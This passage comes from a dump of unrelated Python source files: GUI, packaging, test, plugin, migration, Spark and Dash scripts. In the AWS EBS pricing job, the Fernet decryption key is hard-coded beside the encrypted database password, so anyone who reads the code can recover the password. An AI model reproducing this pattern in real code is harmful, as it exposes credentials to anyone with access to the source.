text=\"Check\", bg=\"gray\", fg=\"black\", command=lambda: check_for_correlation())\n\n '''Combo boxes'''\n # Radio buttons values must be different from each other\n selected2 = StringVar() # Selected for x axis\n selected3 = StringVar() # Selected for y axis\n combo1 = Combobox(window, width=33, state='readonly')\n combo2 = Combobox(window, width=33, state='readonly')\n combo3 = Combobox(window, width=33, state='disabled')\n\n combo1['values'] = ('Ultimas 24 horas', 'Ultimas 72 horas', 'Ultima semana')\n combo2['values'] = ('% de Corriente a Plena Carga', 'Presión de Aceite', 'Presion del Evaporador',\n 'Presión de condensador', 'Saturacion en condensador', 'Saturacion en Evaporador',\n 'Temp Introduciendo Agua Helada', 'Temp Salida Agua Helada',\n 'Temp Introduciendo Agua de condensación', 'Temp Salida agua de condensación',\n 'Temperatura de Descarga','Temperatura del Depósito de Aceite')\n\n combo3['values'] = ('% de Corriente a Plena Carga', 'Presión de Aceite', 'Presion del Evaporador',\n 'Presión de condensador', 'Saturacion en condensador', 'Saturacion en Evaporador',\n 'Temp Introduciendo Agua Helada', 'Temp Salida Agua Helada',\n 'Temp Introduciendo Agua de condensación', 'Temp Salida agua de condensación',\n 'Temperatura 
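# --- Minimal sketch (invented data) of the correlation screen above:
# np.corrcoef on two 1-D arrays returns a 2x2 matrix; the off-diagonal entry
# [0][1] is the Pearson r that check_for_correlation() thresholds at |r| >= 0.1.
import numpy as np

a = np.array([1.0, 2.0, 3.0, 4.0])
b = np.array([2.1, 3.9, 6.2, 8.1])
r = np.corrcoef(a, b)[0][1]
assert abs(r) >= 0.1  # the code above would then set corr_mat[i][j] = 1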
de Descarga','Temperatura del Depósito de Aceite')\n #combo3.set(\"\")\n #combo3.trace('values', on_select)\n combo2.bind(\"<>\", lambda _ : on_select())\n\n #corrp, poil, pev, pcon, scon, sev, temphi, temphs, tempci, tempcs, tempd, tempa\n dictionary.extend(('% de Corriente a Plena Carga', 'Presión de Aceite', 'Presion del Evaporador',\n 'Presión de condensador', 'Saturacion en condensador', 'Saturacion en Evaporador',\n 'Temp Introduciendo Agua Helada', 'Temp Salida Agua Helada',\n 'Temp Introduciendo Agua de condensación', 'Temp Salida agua de condensación',\n 'Temperatura de Descarga','Temperatura del Depósito de Aceite'))\n '''Textboxes'''\n # Correlation Coefficient\n txt_1 = Text(window, state='disabled', width=20, height=1)\n\n \"\"\"-------------------------------------------------GRID--------------------------------------------------------\"\"\"\n '''Labels Grid'''\n # Push data\n # lbl_1.grid(column=0, row=0)\n # Get data\n lbl_2.grid(column=0, row=1)\n # Check correlation\n lbl_4.grid(column=2, row=1)\n # X axis\n lbl_6.grid(column=0, row=8)\n # Y axis\n lbl_7.grid(column=0, row=10)\n\n\n '''Buttons grid'''\n # Push data\n # btn_1.grid(column=1, row=0)\n # Get data\n btn_2.grid(column=1, row=2)\n # Graph variables\n btn_3.grid(column=1, row=11)\n # Check correlation\n btn_4.grid(column=3, row=1)\n\n '''Radio buttons grid'''\n # Time lapse\n combo1.grid(column=1, row=1)\n combo2.grid(column=1, row=8)\n combo3.grid(column=1, row=10)\n\n '''Textboxes grid'''\n\n # Window loop, must be at the end\n window.mainloop()\n","sub_path":"fireb.py","file_name":"fireb.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"58868400","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\nfrom codecs import open\nfrom os import path\n\nbasedir = path.abspath(path.dirname(__file__))\n\nwith open(path.join(basedir, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(name='hana',\n version='0.0.1',\n\n description='Static site generator',\n long_description=long_description,\n\n author='Mayo Jordanov',\n author_email='mayo@oyam.ca',\n\n url='https://github.com/mayo/hana',\n\n license='MIT',\n\n classifiers=[\n 'Development Status :: 3 - Alpha',\n\n 'License :: Other/Proprietary License',\n\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n ],\n\n keywords='hana static site generator processing file',\n\n packages=['hana'],\n\n# entry_points={\n# 'console_scripts': [\n# 'hana = hana.core:main',\n# ]\n# }\n)\n\n","sub_path":"pypi_install_script/hana-0.0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223371016","text":"import sqlite3\nconn = sqlite3.connect(\"quotes.db\")\n\n# To open sql file \ncurr = conn.cursor()\n\ncurr.execute(\"\"\"create table quotes_db(\n title text,\n author text,\n tag text)\"\"\")\n\nconn.commit()\nconn.close()","sub_path":"web_crawler/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"216295067","text":"#!/usr/bin/env python3.3\n# -*- coding: utf-8 -*-\n#\n# Bookmark plug-in for CVE-Search\n#\n# Software is free software released under the \"Modified BSD license\"\n#\n# Copyright (c) 2016 \tPieter-Jan Moreels - pieterjan.moreels@gmail.com\n\n# 
Necessary imports\nimport os\nimport sys\nimport __main__\ncallLocation = os.path.dirname(os.path.realpath(__main__.__file__))\nsys.path.append(os.path.join(callLocation, \"..\"))\n\nfrom lib.Plugins import Plugin, WebPlugin\nimport lib.CVEs as cves\nimport lib.DatabaseLayer as db\n\nclass bookmark(WebPlugin):\n def __init__(self):\n super().__init__()\n self.name = \"Bookmarks\"\n self.requiresAuth = True\n self.collectionName = \"user_bookmarks\"\n\n def getPage(self, **args):\n cvesp = cves.CveHandler(rankinglookup=True, namelookup=True, via4lookup=True, capeclookup=True,subscorelookup=True)\n data = db.p_queryOne(self.collectionName, {\"user\": args[\"current_user\"].get_id()})\n bookmarks = data.get(\"bookmarks\", []) if data else []\n cve=[cvesp.getcve(cveid=x) for x in bookmarks]\n page=\"bookmarks.html\"\n return (page, {\"cve\": cve})\n\n def getCVEActions(self, cve, **args):\n userdata = db.p_queryOne(self.collectionName, {'user': args[\"current_user\"].get_id()})\n if userdata and 'bookmarks' in userdata and cve in userdata['bookmarks']:\n return [{'text': 'Remove bookmark', 'action': 'unbookmark', 'icon': 'star'}]\n else:\n return [{'text': 'Bookmark', 'action': 'bookmark', 'icon': 'star-empty'}]\n\n def onCVEAction(self, cve, action, **args):\n try:\n query = {'user': args[\"current_user\"].get_id()}\n if action == \"bookmark\":\n db.p_addToList(self.collectionName, query, \"bookmarks\", cve)\n elif action == \"unbookmark\":\n db.p_removeFromList(self.collectionName, query, \"bookmarks\", cve)\n return True\n except Exception as e:\n return False\n","sub_path":"plugins/plugins/bookmarks/plugins/bookmark.py","file_name":"bookmark.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130322448","text":"import unittest\nimport sys\nsys.path.append(\"../scripts\")\nfrom flatfeature import Bed\nfrom merge2 import parse_missed_genes,group_genes_in_bed,update_locs,merge_hits,no_intervening_genes\n\nclass TestMask(unittest.TestCase):\n def setUp(self):\n self.old_bed = Bed(\"data/rice_t_sorghum_v1/sorghum_v1.bed\")\n self.missed_bed = Bed(\"data/rice_t_sorghum_v1/missed_sorghum_v1_from_rice_b.bed\")\n self.matches = \"data/rice_t_sorghum_v1/missed_sorghum_v1_from_rice_b.matches.txt\"\n self.missed_genes = parse_missed_genes(self.matches)\n self.missed_genes_grouped, self.missed_genes_dict = group_genes_in_bed(self.missed_genes,self.old_bed,self.missed_bed)\n \n def test_group_genes_in_bed(self):\n missed_genes_grouped, missed_genes_dict = group_genes_in_bed(self.missed_genes,self.old_bed,self.missed_bed)\n ### adding to old bed example\n self.assertEqual(missed_genes_dict['Sb01g039400']['locs'], [(62821196, 62822809), (62822899, 62823011)])\n #### example with more then one hit for os03\n self.assertEqual(missed_genes_grouped[\"Os03g06330\"],[('1', 1035243, 1035376, 'sorghum_v1_1_1035243_1035376'), ('1', 43157679, 43159029, 'sorghum_v1_1_43157679_43159029')])\n def test_update_locs(self):\n pass\n #make sure gets samllest and largerst correct\n def test_merge_hits(self):\n hits = tuple(self.missed_genes_grouped[\"Os03g49400\"])\n hits = list(hits)\n merged_hit = merge_hits(hits,self.old_bed, self.missed_genes_dict)\n self.assertEqual(len(merged_hit),1)\n self.assertEqual(len(merged_hit['sorghum_v1_1_9901089_9901320']['locs']),3)\n self.assertEqual(merged_hit['sorghum_v1_1_9901089_9901320']['start'],9896924)\n self.assertEqual(merged_hit['sorghum_v1_1_9901089_9901320']['end'],9901320)\n ### 
find a large pair of hits that should be merged\n    def test_merge_hits_none(self):\n        ## none of the hits should merge\n        hits = (self.missed_genes_grouped[\"Os01g58037\"])\n        merged_hit = merge_hits(hits,self.old_bed,self.missed_genes_dict)\n        self.assertEqual(len(merged_hit),5)\n\n    def test_no_intervening_genes(self):\n        hit = self.missed_genes_grouped[\"Os01g58037\"][0]\n        b_hit = ('1',10267337,10267500, 'example')\n        booln = no_intervening_genes(hit,b_hit,self.old_bed)\n        self.assertEqual(booln,True)\n        ### confirm that a hit within an intervening gene is not found\n\nif __name__ == '__main__':\n    unittest.main()\n    suite = unittest.TestLoader().loadTestsFromTestCase(TestSequenceFunctions)\n    unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"pipeline/coann/merge_test.py","file_name":"merge_test.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258558385","text":"##############################################################################\n#\n# Copyright (C) Zenoss, Inc. 2020, all rights reserved.\n#\n# This content is made available according to terms specified in\n# License.zenoss under the directory where your Zenoss product is installed.\n#\n##############################################################################\nfrom __future__ import print_function\n\n__doc__ = '''\nAdd global.conf built by serviced to mariadb services\nto have actual config instead of default\n'''\n\nimport servicemigration as sm\n\nversion = \"7.0.16\"\n\n\ndef migrate(ctx, *args, **kw):\n    updated = False\n    global_conf = sm.ConfigFile(\n        name=\"/opt/zenoss/etc/global.conf\",\n        filename=\"/opt/zenoss/etc/global.conf\",\n        owner=\"zenoss:zenoss\",\n        permissions=\"660\",\n        content=\"# Generated by serviced\\n{{range $k,$v:=contextFilter . 
\\\"global.conf.\\\"}}{{$k}} {{$v}}\\n{{end}}\"\n )\n\n mariadbs = filter(lambda s: s.name in [\"mariadb-model\", \"mariadb-events\", \"mariadb\"], ctx.services)\n for svc in mariadbs:\n if not [cfg for cfg in svc.originalConfigs if cfg.name == global_conf.name]:\n svc.originalConfigs.append(global_conf)\n updated = True\n print(\"Updated %s service\" % svc.name)\n\n if not [cfg for cfg in svc.configFiles if cfg.name == global_conf.name]:\n svc.configFiles.append(global_conf)\n updated = True\n print(\"Updated %s service\" % svc.name)\n\n return updated\n","sub_path":"migrations/src/zenservicemigration/migrations/add_globalconf_to_mariadb.py","file_name":"add_globalconf_to_mariadb.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532034942","text":"\"\"\"\nThis file contains an instrument for correcting distortions\nusing linear filtering (scipy.signal.lfilter).\n\nIt is based on the kernel_object.DistortionsKernel\n\"\"\"\nimport numpy as np\nfrom qcodes.instrument.base import Instrument\nfrom qcodes.utils import validators as vals\nfrom qcodes.instrument.parameter import ManualParameter\n\nfrom pycqed.measurement import kernel_functions_ZI as kf\n\n\nclass LinDistortionKernel(Instrument):\n\n def __init__(self, name, num_models=10, **kw):\n super().__init__(name, **kw)\n self._num_models = num_models\n\n self.add_parameter('cfg_hardware_friendly',\n initial_value=False,\n parameter_class=ManualParameter,\n vals=vals.Bool())\n self.add_parameter('cfg_sampling_rate',\n parameter_class=ManualParameter,\n initial_value=1e9,\n vals=vals.Numbers())\n\n self.add_parameter('cfg_gain_correction',\n parameter_class=ManualParameter,\n initial_value=1,\n vals=vals.Numbers())\n\n for i in range(self._num_models):\n self.add_parameter('filter_model_{:02}'.format(i),\n parameter_class=ManualParameter,\n initial_value={},\n vals=vals.Dict())\n\n def reset_kernels(self):\n \"\"\"\n Resets all kernels to an empty dict so no distortion is applied.\n \"\"\"\n for filt_id in range(self._num_models):\n self.set('filter_model_{:02}'.format(filt_id), {})\n\n def get_first_empty_filter(self):\n \"\"\"\n Resets all kernels to an empty dict so no distortion is applied.\n \"\"\"\n for filt_id in range(self._num_models):\n if self.get('filter_model_{:02}'.format(filt_id)) == {}:\n return filt_id\n raise ValueError('No empty filter')\n\n def distort_waveform(self, waveform, length_samples: int=None,\n inverse: bool=False):\n \"\"\"\n Distorts a waveform using the models specified in the Kernel Object.\n Args:\n waveform (array) : waveform to be distorted\n lenght_samples (int): number of samples after which to cut of wf\n inverse (bool) : if True apply the inverse of the waveform.\n\n Returns:\n y_sig (array) : waveform with distortion filters applied\n\n N.B. 
the bounce correction does not have an inverse implemented\n (June 2018) MAR\n \"\"\"\n if length_samples is not None:\n extra_samples = length_samples - len(waveform)\n if extra_samples >= 0:\n y_sig = np.concatenate([waveform, np.zeros(extra_samples)])\n else:\n y_sig = waveform[:extra_samples]\n else:\n y_sig = waveform\n for filt_id in range(self._num_models):\n filt = self.get('filter_model_{:02}'.format(filt_id))\n\n if not filt:\n pass # dict is empty\n else:\n model = filt['model']\n if not self.cfg_hardware_friendly():\n if model == 'high-pass':\n y_sig = kf.bias_tee_correction(\n y_sig, sampling_rate=self.cfg_sampling_rate(),\n inverse=inverse,\n **filt['params'])\n elif model == 'exponential':\n y_sig = kf.exponential_decay_correction(\n y_sig, sampling_rate=self.cfg_sampling_rate(),\n inverse=inverse,\n **filt['params'])\n elif model == 'bounce':\n y_sig = kf.bounce_correction(\n y_sig, sampling_rate=self.cfg_sampling_rate(),\n inverse=inverse,\n **filt['params'])\n else:\n raise KeyError('Model {} not recognized'.format(model))\n else:\n raise NotImplementedError()\n if inverse:\n y_sig /= self.cfg_gain_correction()\n else:\n y_sig *= self.cfg_gain_correction()\n return y_sig\n\n def print_overview(self):\n print(\"*\"*80)\n print(\"Overview of {}\".format(self.name))\n for filt_id in range(self._num_models):\n\n filt = self.get('filter_model_{:02}'.format(filt_id))\n if filt != {}:\n model = filt['model']\n params = filt['params']\n\n print('Model {} {}: \\n {}'.format(filt_id, model, params))\n\n print(\"*\"*80)\n","sub_path":"pycqed/instrument_drivers/meta_instrument/lfilt_kernel_object.py","file_name":"lfilt_kernel_object.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"348713321","text":"from back_end_test.test_main import helper\n\n\ndef test_r1(capsys):\n \"\"\"\n Test 1: When account is valid and account has sufficient funds to handle withdrawal\n \"\"\"\n helper(\n capsys=capsys,\n input_master_accounts=[\n '1000327 10000 Spencer Venable'\n ],\n input_merged_transactions=[\n 'WDR 1000327 5000 0000000 ***',\n 'EOS 0000000 000 0000000 ***'\n ],\n expected_valid_accounts=[\n '1000327'\n ], \n expected_master_accounts=[\n '1000327 5000 Spencer Venable'\n ],\n expected_tail_of_terminal_output=[\n ]\n )\n\n\ndef test_r2(capsys):\n \"\"\"\n Test 2: When account is valid and account has insufficient funds to handle withdrawal\n \"\"\"\n helper(\n capsys=capsys,\n input_master_accounts=[\n '1000327 2000 Spencer Venable',\n '1000326 10000 Ben Lammers'\n ],\n input_merged_transactions=[\n 'WDR 1000327 5000 0000000 ***',\n 'EOS 0000000 000 0000000 ***'\n ],\n expected_valid_accounts=[\n '1000326'\n ], \n expected_master_accounts=[\n '1000326 10000 Ben Lammers'\n ],\n expected_tail_of_terminal_output=[\n \"Withdraw Error: Account 1000327 has insufficient funds\",\n \"Transaction: WDR 1000327 5000 0000000 ***\"\n ]\n )\n\n\ndef test_r3(capsys):\n \"\"\"\n Test 3: Account does not exist in withdrawal transaction\n \"\"\"\n helper(\n capsys=capsys,\n input_master_accounts=[\n '1000327 10000 Spencer Venable'\n ],\n input_merged_transactions=[\n 'WDR 1000326 5000 0000000 ***',\n 'EOS 0000000 000 0000000 ***'\n ],\n expected_valid_accounts=[\n '1000327'\n ], expected_master_accounts=[\n '1000327 10000 Spencer Venable'\n ],\n expected_tail_of_terminal_output=[\n \"Withdraw Error: Account 1000326 does not exist\",\n \"Transaction: WDR 1000326 5000 0000000 ***\"\n ]\n 
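# --- Hedged usage sketch for the kernel object above. The 'tau' and 'amp'
# parameter names are assumptions about what
# kernel_functions_ZI.exponential_decay_correction() expects; check that module
# before relying on them. Requires a working QCoDeS environment.
import numpy as np

lin_kern = LinDistortionKernel('lk')
slot = lin_kern.get_first_empty_filter()
lin_kern.set('filter_model_{:02}'.format(slot),
             {'model': 'exponential', 'params': {'tau': 10e-6, 'amp': -0.02}})

square = np.concatenate([np.zeros(50), np.ones(200), np.zeros(50)])
corrected = lin_kern.distort_waveform(square, length_samples=400)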
)\n","sub_path":"back_end_test/test_withdraw.py","file_name":"test_withdraw.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438681837","text":"from __future__ import print_function\n#\n# This cfg calls MakeAngleLUT which is obsolete and completely unused.\n#\n\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Whatever\")\n\nprocess.load('Configuration.Geometry.GeometryExtended2023D4Reco_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, '90X_upgrade2023_realistic_v9', '')\nprint(\"Using GlobalTag: %s\" % process.GlobalTag.globaltag.value())\n\n# Fake alignment is/should be ideal geometry\n# ==========================================\nprocess.load(\"Alignment.CommonAlignmentProducer.FakeAlignmentSource_cfi\")\nprocess.preferFakeAlign = cms.ESPrefer(\"FakeAlignmentSource\")\n\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(1))\n\nprocess.analyzer1 = cms.EDAnalyzer(\"MakeAngleLUT\",\n # Verbosity level\n verbosity = cms.untracked.int32(1),\n\n # Output file\n outfile = cms.string(\"angle.root\"),\n)\n\nprocess.path1 = cms.Path(process.analyzer1)\n","sub_path":"L1Trigger/L1TMuonEndCap/test/tools/make_anglelut_phasetwogeom.py","file_name":"make_anglelut_phasetwogeom.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"186131422","text":"#!/usr/bin/env python\nimport argparse\nimport os\nfrom image_utils import summary\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"image\", type=str, help=\"Path to image to summarize\")\nparser.add_argument(\"destination\", type=str, help=\"Path to destination JSON file\")\nparser.add_argument('-n', '--no_convert', action='store_false', help='skip converting step (add if not providing grayscale images)')\nparser.add_argument('-s', '--silent', action='store_true')\n\nargs = parser.parse_args()\n\nimage = args.image\nsilent = args.silent\ndestination = args.destination\nno_convert = args.no_convert\n\nif (not os.path.exists(image)):\n if (not silent):\n print(\"Image %s does not exist.\" % image)\n exit()\n\nif (not os.path.exists(os.path.dirname(destination))):\n if (not silent):\n print(\"Folder does not exist.\")\n exit()\n\njson_str = summary.summarize(image, convert=no_convert, silent=silent)\n\nfile = open(destination,\"w\") \nfile.write(json_str)\nfile.close() \n","sub_path":"summarize_file.py","file_name":"summarize_file.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136698801","text":"class stats(object):\n\t\"\"\"docstring for stats\"\"\"\n\tdef __init__(self, health, stren, dex, con, intel, cha):\n\t\tsuper(stats, self).__init__()\n\t\t# Base stat values\n\t\tself.healthTotal = health\n\t\tself.healthCurrent = health\n\t\tself.str = stren\n\t\tself.dex = dex\n\t\tself.con = con\n\t\tself.int = intel\n\t\tself.cha = cha\n\n\t\t# Stat values after modification from equipment or other effects\n\t\tself.moddedHealthTotal = health\n\t\tself.moddedStr = stren\n\t\tself.moddedDex = dex\n\t\tself.moddedCon = con\n\t\tself.moddedInt = intel\n\t\tself.moddedCha = 
cha\n\t\t","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"295967930","text":"# Compute the average temperature and pressure collected by a weather station over one week,\n# assuming it takes only one measurement per day.\n\ntemp_lunes = 30\ntemp_martes = 29.5\ntemp_miercoles = 28.5\ntemp_jueves = 25.9\ntemp_viernes = 24.5\ntemp_sabado = 23.5\ntemp_domingo = 23\n\npres_lunes = 1000\npres_martes = 1050\npres_miercoles = 1100\npres_jueves = 1150\npres_viernes = 1120\npres_sabado = 1100\npres_domingo = 1080\n\n\ncalculo_promedio_temp = (temp_domingo + temp_sabado + temp_viernes + temp_jueves + temp_miercoles + temp_martes + temp_lunes)/7\n\ncalculo_promedio_pres = (pres_domingo + pres_sabado + pres_viernes + pres_jueves + pres_miercoles + pres_martes + pres_lunes)/7\n\nprint('Promedio de temperaturas: ',calculo_promedio_temp)\nprint('Promedio de presiones: ',calculo_promedio_pres)\n","sub_path":"practica n1/ejercicio 16.py","file_name":"ejercicio 16.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"280687598","text":"import requests\r\nimport json\r\nimport cryptography\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql import functions as F\r\nfrom cryptography.fernet import Fernet\r\nfrom pyspark.sql.window import Window\r\nfrom pyspark.sql.functions import row_number,lit,col,explode\r\nfrom pyspark.sql.types import StructField, StructType, StringType, MapType,IntegerType\r\ndef Amazon_EBS():\r\n    key = b'dmnTQwD6a-YiyO8XgQTTnTQFH3xYSrFMTzpBrL2spIA='\r\n    fernet = Fernet(key)\r\n    enc_pwd = b'gAAAAABhVrNOKQEgiJyBIyL4QED2zocoz-NBhmVkrxkgtAvW9KrdLW708lLAOj_pLajlEBuBmtNLXwnNy5UGm5vGGtTnuHFdTQ=='\r\n    dec_pwd = fernet.decrypt(enc_pwd).decode()\r\n    contents = open(\"C:/Users/mkhan369/PycharmProjects/Spark_Examples/venv/Include/spark-warehouse/Sample/CONFIG_LOADER/config.txt\").read()\r\n    c = json.loads(contents)\r\n    dict1 = []\r\n    f = open(\"C:/Users/mkhan369/PycharmProjects/Spark_Examples/venv/Include/spark-warehouse/Sample/CONFIG_LOADER/EBS.json\",\"r\")\r\n    x1 = json.load(f)\r\n    dict1.append(x1)\r\n    spark = SparkSession.builder.appName('Clou_pricing_API').config(\"spark.jars\", \"file:///C:/Users/mkhan369/Downloads/mysql-connector-java-8.0.26/mysql-connector-java-8.0.26.jar\").getOrCreate()\r\n    m1 = spark.createDataFrame(data=dict1, schema=eval(c['EBSschema']))\r\n    s1 = m1.select(F.explode(\"products\"))\r\n    s1.createOrReplaceTempView(\"test\")\r\n    products = spark.sql(\r\n        \"\"\"select key, value['sku'] as sku, value['productFamily'] as product_Family, value['attributes']['location'] as location, value['attributes']['storageMedia'] as\r\n        storageMedia, value['attributes']['volumeType'] as volumeType, value['attributes']['maxVolumeSize'] as maxVolumeSize, value['attributes']['marketoption'] as termtype, value['attributes']['maxIopsvolume'] as maxIopsvolume,\r\n        value['attributes']['maxThroughputvolume'] as maxThroughputvolume, value['attributes']['maxIopsBurstPerformance'] as IopsBurstPerformance, value['attributes']['volumeApiName'] as volumeApiName from test \"\"\")\r\n    df = m1.select(explode('terms.OnDemand')).select(explode('value')).select('value.*',explode('value.priceDimensions').alias('x', 'y')).select('sku','effectiveDate',\r\n                                            col('y.unit').alias('unit'), 
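# --- Equivalent sketch (not part of the exercise) using lists instead of seven
# scalar variables; the arithmetic is the same: average = sum of readings / 7.
temps = [30, 29.5, 28.5, 25.9, 24.5, 23.5, 23]
pressures = [1000, 1050, 1100, 1150, 1120, 1100, 1080]

avg_temp = sum(temps) / len(temps)
avg_pres = sum(pressures) / len(pressures)
print(avg_temp, avg_pres)  # ~26.41 and ~1085.71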
col('y.description').alias('Price_description'),explode('y.pricePerUnit').alias( 'Currency','pricePerUnit'))\r\n finaldf = df.withColumn('created_on', F.lit(\"2021-09-01 15:33:34.405099\")).withColumn('Updated_On',F.current_timestamp()).withColumn('Created_by', F.lit(\"Group_2@gmail.com\")).withColumn(\"Updated_by\", F.lit(\"Group_2\"))\r\n EBSpricing = finaldf.join(products, 'sku')\r\n EBSpricing = EBSpricing.select('*').where(EBSpricing.product_Family == 'Storage')\r\n w = Window().orderBy('sku')\r\n EBSpricing = EBSpricing.withColumn(\"pricing_aws_ebs_id\", row_number().over(w))\r\n EBSpricing.createOrReplaceTempView(\"data\")\r\n final=spark.sql(\"select pricing_aws_ebs_id,maxVolumeSize,sku as key,Price_description,IopsBurstPerformance,unit,Currency,pricePerUnit,location,\\\r\n storageMedia,volumeType,termtype,maxThroughputvolume,volumeApiName,effectiveDate,created_on,Created_by,Updated_On,Updated_by from data\")\r\n final.show(truncate=0)\r\n final.repartition(1).write.csv(c[\"outputEBS\"],header=True)\r\n final.write.mode(\"overwrite\").format(\"jdbc\").option(\"url\", \"jdbc:mysql://localhost:3306/pricing_api?useSSL=false\").option(\r\n \"driver\", \"com.mysql.jdbc.Driver\").option(\"dbtable\", c[\"mysql\"][\"tableAM_EBS\"]).option(\"user\",c[\"mysql\"][\"rootAM_EBS\"]).option(\"password\",dec_pwd).save()\r\n print(\"!!!!!!!!!!!!!!!!!!!!!!successfully stored in mysql!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\r\n# if __name__ ==\"__main__\":\r\n# Amazon_EBS()","sub_path":"Services/AWS_EBS.py","file_name":"AWS_EBS.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498954749","text":"# -*- coding: utf-8 -*-\nimport time\nimport os\nimport json\nimport gzip\nimport shutil\nimport requests\nimport numpy as np\nimport pyarrow as pa\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport dash_daq as daq\nfrom plotly.colors import sequential\n\nfrom dask import delayed\nfrom distributed import Client\nfrom dask_cuda import LocalCUDACluster\n\nimport cudf\nimport cupy\n\n# Disable cupy memory pool so that cupy immediately releases GPU memory\ncupy.cuda.set_allocator(None)\n\n# Colors\nbgcolor = \"#191a1a\" # mapbox dark map land color\ntext_color = \"#cfd8dc\" # Material blue-grey 100\nmapbox_land_color = \"#343332\"\n\n# Figure template\nrow_heights = [150, 440, 200]\ntemplate = {\n 'layout': {\n 'paper_bgcolor': bgcolor,\n 'plot_bgcolor': bgcolor,\n 'font': {'color': text_color},\n \"margin\": {\"r\": 0, \"t\": 30, \"l\": 0, \"b\": 20},\n 'bargap': 0.05,\n 'xaxis': {'showgrid': False, 'automargin': True},\n 'yaxis': {'showgrid': True, 'automargin': True,\n 'gridwidth': 0.5, 'gridcolor': mapbox_land_color},\n }\n}\n\n\n# Load mapbox token from environment variable or file\ntoken = os.getenv('MAPBOX_TOKEN')\nif not token:\n token = open(\".mapbox_token\").read()\n\n# geojson URL\nzip3_url = 'https://raw.githubusercontent.com/rapidsai/cuxfilter/GTC-2018-mortgage-visualization/javascript/demos/GTC%20demo/src/data/zip3-ms-rhs-lessprops.json'\n\n# Download geojson so we can read all of the zip3 codes we have\nresponse = requests.get(zip3_url)\nzip3_json = json.loads(response.content.decode())\nvalid_zip3s = {int(f['properties']['ZIP3']) for f in zip3_json[\"features\"]}\n\n\n# Names of float columns\nfloat_columns = [\n 'current_actual_upb', 'dti', 'borrower_credit_score', 
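# --- Side sketch of the Fernet round-trip that Amazon_EBS() relies on to
# recover the MySQL password (a fresh key is generated here, unlike the
# hard-coded one above).
from cryptography.fernet import Fernet

key = Fernet.generate_key()
fernet = Fernet(key)
token = fernet.encrypt(b'db-password')
assert fernet.decrypt(token).decode() == 'db-password'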
'delinquency_12_prediction'\n]\n\ncolumn_labels = {\n 'delinquency_12_prediction': 'Risk Score',\n 'borrower_credit_score': 'Borrower Credit Score',\n 'current_actual_upb': 'Unpaid Balance',\n 'dti': 'Debt to Income Ratio',\n}\n\n\ndef load_dataset(path):\n \"\"\"\n Args:\n path: Path to arrow file containing mortgage dataset\n\n Returns:\n pandas DataFrame\n \"\"\"\n # Load dataset as pyarrow table\n reader = pa.RecordBatchStreamReader(path)\n pa_table = reader.read_all()\n\n # Convert to pandas DataFrame\n pd_df = pa_table.to_pandas()\n\n # Convert zip to int16\n pd_df['zip'] = pd_df['zip'].astype('int16')\n\n # drop extra columns\n pd_df.drop(['loan_id', 'seller_name'], axis=1, inplace=True)\n\n return pd_df\n\n\ndef compute_bounds(df, columns):\n \"\"\"\n Compute the min/max bounds of select columns in a DataFrame\n Args:\n df: pandas or cudf DataFrame\n columns: list of columns to compute bounds on\n\n Returns:\n dict from input columns to (min, max) tuples\n \"\"\"\n return {c: (df[c].min(), df[c].max()) for c in columns}\n\n\n# Build Dash app and initial layout\ndef blank_fig(height):\n \"\"\"\n Build blank figure with the requested height\n Args:\n height: height of blank figure in pixels\n Returns:\n Figure dict\n \"\"\"\n return {\n 'data': [],\n 'layout': {\n 'height': height,\n 'template': template,\n 'xaxis': {'visible': False},\n 'yaxis': {'visible': False},\n }\n }\n\n\napp = dash.Dash(__name__)\napp.layout = html.Div(children=[\n html.Div([\n html.H1(children=[\n 'Mortgage Risk Model',\n html.A(\n html.Img(\n src=\"assets/dash-logo.png\",\n style={'float': 'right', 'height': '50px', 'margin-right': '2%'}\n ), 